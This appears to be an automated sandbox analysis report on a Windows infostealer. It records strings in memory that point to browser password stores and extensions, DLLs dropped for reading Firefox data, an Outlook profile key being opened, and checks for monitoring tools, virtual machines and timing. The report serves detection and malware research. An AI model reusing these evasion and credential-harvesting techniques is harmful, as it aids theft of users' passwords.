Source: file.exe, 00000000.00000002.1952414241.0000000029C63000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp, IEHDBGDHDAECBGDHJKFI.0.dr	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: file.exe, 00000000.00000003.1803797616.00000000017EB000.00000004.00000020.00020000.00000000.sdmp, IECFBKFH.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: BGIJJKKJJDAAAAAKFHJJDGDAFB.0.dr	String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: BGIJJKKJJDAAAAAKFHJJDGDAFB.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: file.exe, 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: BGIJJKKJJDAAAAAKFHJJDGDAFB.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: file.exe, 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.1880335955.0000000029EA9000.00000004.00000020.00020000.00000000.sdmp, BGIJJKKJJDAAAAAKFHJJDGDAFB.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: file.exe, 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: BGIJJKKJJDAAAAAKFHJJDGDAFB.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.1880335955.0000000029EA9000.00000004.00000020.00020000.00000000.sdmp, BGIJJKKJJDAAAAAKFHJJDGDAFB.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB80BE	0_2_00FB80BE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EB08A6	0_2_00EB08A6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E6202E	0_2_00E6202E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E57190	0_2_00E57190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FAF16B	0_2_00FAF16B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FAFAB1	0_2_00FAFAB1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FBD27E	0_2_00FBD27E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F3A3F1	0_2_00F3A3F1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB4B75	0_2_00FB4B75
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F444FD	0_2_00F444FD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB9C9F	0_2_00FB9C9F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F0AC5A	0_2_00F0AC5A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FBED6B	0_2_00FBED6B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FAC53A	0_2_00FAC53A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F51EBC	0_2_00F51EBC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EE07DB	0_2_00EE07DB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FBB7AE	0_2_00FBB7AE

Source: C:\Users\user\Desktop\file.exe

Code function: String function: 00BE45C0 appears 316 times

Source: file.exe, 00000000.00000002.1955806968.000000006C865000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.1955949885.000000006F902000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: jsfsowjs ZLIB complexity 0.9946614583333333

Source: file.exe, 00000000.00000003.1710578574.0000000005570000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/22@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00BF8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

0_2_00BF8680

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00BF3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00BF3720

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\GJ0D3M7X.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.1955714041.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1947879466.000000001DCCD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1955406006.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.1955714041.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1947879466.000000001DCCD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1955406006.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.1955714041.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1947879466.000000001DCCD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1955406006.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.1955714041.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1947879466.000000001DCCD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1955406006.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.1955714041.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1947879466.000000001DCCD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1955406006.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.1955714041.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1947879466.000000001DCCD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1955406006.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000002.1947879466.000000001DCCD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1955406006.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.1803303966.000000001DBC4000.00000004.00000020.00020000.00000000.sdmp, DGHIDHCAAKECGCBFIJDB.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.1947879466.000000001DCCD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1955406006.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.1947879466.000000001DCCD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1955406006.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

Virustotal: Detection: 52%

Source: file.exe	String found in binary or memory: ft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d
Source: file.exe	String found in binary or memory: m/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?
Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1868800 > 1048576

Source: file.exe

Static PE information: Raw size of jsfsowjs is bigger than: 0x100000 < 0x1a2200

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.1955906746.000000006F8ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.1955714041.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.1955714041.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.1955906746.000000006F8ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.be0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;jsfsowjs:EW;bgqvnsxf:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;jsfsowjs:EW;bgqvnsxf:EW;.taggant:EW;

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00BF9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00BF9860

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x1d6ce0 should be: 0x1ca72c

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: jsfsowjs
Source: file.exe	Static PE information: section name: bgqvnsxf
Source: file.exe	Static PE information: section name: .taggant
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FD60E8 push edi; mov dword ptr [esp], edx	0_2_00FD67D7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0105A13F push 01A21687h; mov dword ptr [esp], eax	0_2_0105A2B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB80BE push ecx; mov dword ptr [esp], 7FEFCAB3h	0_2_00FB80D6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB80BE push 0358E126h; mov dword ptr [esp], edi	0_2_00FB8169
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB80BE push 71CFDB26h; mov dword ptr [esp], esi	0_2_00FB8180
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB80BE push edx; mov dword ptr [esp], ecx	0_2_00FB818A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB80BE push 36CE0900h; mov dword ptr [esp], esi	0_2_00FB8231
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB80BE push edx; mov dword ptr [esp], 7FABE71Ah	0_2_00FB8260
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB80BE push 6034FDC4h; mov dword ptr [esp], esi	0_2_00FB82FA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB80BE push edi; mov dword ptr [esp], ebp	0_2_00FB833A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB80BE push 1650F749h; mov dword ptr [esp], esi	0_2_00FB841E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB80BE push 7EB877DFh; mov dword ptr [esp], ecx	0_2_00FB847A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB80BE push ecx; mov dword ptr [esp], edi	0_2_00FB8497
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB80BE push ebx; mov dword ptr [esp], 172278E7h	0_2_00FB85AD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB80BE push 61FC591Ah; mov dword ptr [esp], ebp	0_2_00FB85F4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB80BE push ebx; mov dword ptr [esp], esp	0_2_00FB8640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB80BE push 53983AFDh; mov dword ptr [esp], edi	0_2_00FB87D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB80BE push eax; mov dword ptr [esp], ecx	0_2_00FB8828
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB80BE push ebx; mov dword ptr [esp], esi	0_2_00FB8847
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB80BE push 06E3CA08h; mov dword ptr [esp], ecx	0_2_00FB887A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB80BE push 201B63BEh; mov dword ptr [esp], eax	0_2_00FB8920
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB80BE push edx; mov dword ptr [esp], 7F5412E0h	0_2_00FB894E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB80BE push ebx; mov dword ptr [esp], edi	0_2_00FB8990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB80BE push esi; mov dword ptr [esp], ecx	0_2_00FB8A13
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB80BE push 79981B34h; mov dword ptr [esp], esi	0_2_00FB8A6E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB80BE push ebp; mov dword ptr [esp], eax	0_2_00FB8AB7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB80BE push ebx; mov dword ptr [esp], edi	0_2_00FB8AF4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB80BE push 5C36592Ah; mov dword ptr [esp], ebp	0_2_00FB8B02
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB80BE push ecx; mov dword ptr [esp], 644CC281h	0_2_00FB8B70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB80BE push ebp; mov dword ptr [esp], ecx	0_2_00FB8C20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB80BE push 554B29D3h; mov dword ptr [esp], edx	0_2_00FB8C45

Source: file.exe

Static PE information: section name: jsfsowjs entropy: 7.953425032944427

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

0_2_00BF9860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-13585

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E42299 second address: E422A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F2F74519256h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E422A3 second address: E41BC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F74D59305h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e pushad 0x0000000f mov dword ptr [ebp+122D1AE8h], ebx 0x00000015 mov ecx, dword ptr [ebp+122D387Ah] 0x0000001b popad 0x0000001c push dword ptr [ebp+122D15E9h] 0x00000022 clc 0x00000023 call dword ptr [ebp+122D2588h] 0x00000029 pushad 0x0000002a jmp 00007F2F74D59301h 0x0000002f xor eax, eax 0x00000031 jmp 00007F2F74D59304h 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a sub dword ptr [ebp+122D1ADFh], edx 0x00000040 mov dword ptr [ebp+122D3862h], eax 0x00000046 xor dword ptr [ebp+122D1ADFh], edx 0x0000004c mov esi, 0000003Ch 0x00000051 or dword ptr [ebp+122D1ADFh], edx 0x00000057 add esi, dword ptr [esp+24h] 0x0000005b stc 0x0000005c lodsw 0x0000005e mov dword ptr [ebp+122D1ADFh], edi 0x00000064 add eax, dword ptr [esp+24h] 0x00000068 jbe 00007F2F74D592FCh 0x0000006e xor dword ptr [ebp+122D1ADFh], eax 0x00000074 mov ebx, dword ptr [esp+24h] 0x00000078 jno 00007F2F74D592FDh 0x0000007e jnp 00007F2F74D59301h 0x00000084 pushad 0x00000085 mov dword ptr [ebp+122D1ADFh], edi 0x0000008b mov dx, bx 0x0000008e popad 0x0000008f nop 0x00000090 push esi 0x00000091 push eax 0x00000092 push edx 0x00000093 push eax 0x00000094 push edx 0x00000095 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E41BC1 second address: E41BC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
